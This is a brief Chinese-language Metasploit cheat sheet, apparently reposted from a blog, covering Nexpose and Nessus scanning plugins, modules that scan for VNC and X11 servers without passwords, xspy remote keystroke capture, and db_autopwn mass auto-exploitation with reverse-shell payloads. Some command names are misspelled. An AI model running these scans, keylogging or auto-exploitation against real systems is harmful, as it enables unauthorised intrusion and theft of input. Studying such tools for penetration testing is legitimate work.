metasploit漏洞扫描

1.常用普通功能

db_destory  //删除数据库
nc ip port  //获取基本系统信息

2.nexpose

连接数据库
load nexpose  //载入nexpose插件
msf > help
msf > nexpose_connect -h   //查看连接nexpose需要的参数
msf >nexpose_connect 用户名:密码 ip地址 ok——登录到nexpose
msf >nexpose_scan	//开始扫描
msf > db_hosts -c adress   //安地址分类查看结果
msf >db_vulns  //查看详细信息

3.nessus

msf >load nessus
msf >nessus_help
msf >nessus_policy_list	//查看扫描选项
msf >nessus_sacn_new 选项号 任务名字 IP地址
msf >nessus_scan_status   //扫描状态
msf >nessus_report_list   //所有扫描结果报告
msf >nessus_report_get ID号		//下载某个报告

4.其他

vnc无密码扫描
msf > use auxiliary/scanner/vnc/vnc_none_auth

x11无密码扫描
msf > use auxiliary/x11/open_x11

xspy远程键盘记录
./xspy -display ip地址

导入漏洞扫描工具生成文件实现自动化攻击
db_autopwn -e -t -r -x -p
e(所有目标发起攻击)
t(显示所有匹配的模块)
r(反弹shell的攻击载荷)
x(根据漏洞选择攻击模块)
p(根据开放的端口选择攻击模块)
攻击成功返回一个shell

原文地址:https://www.cnblogs.com/WTa0/p/11810866.html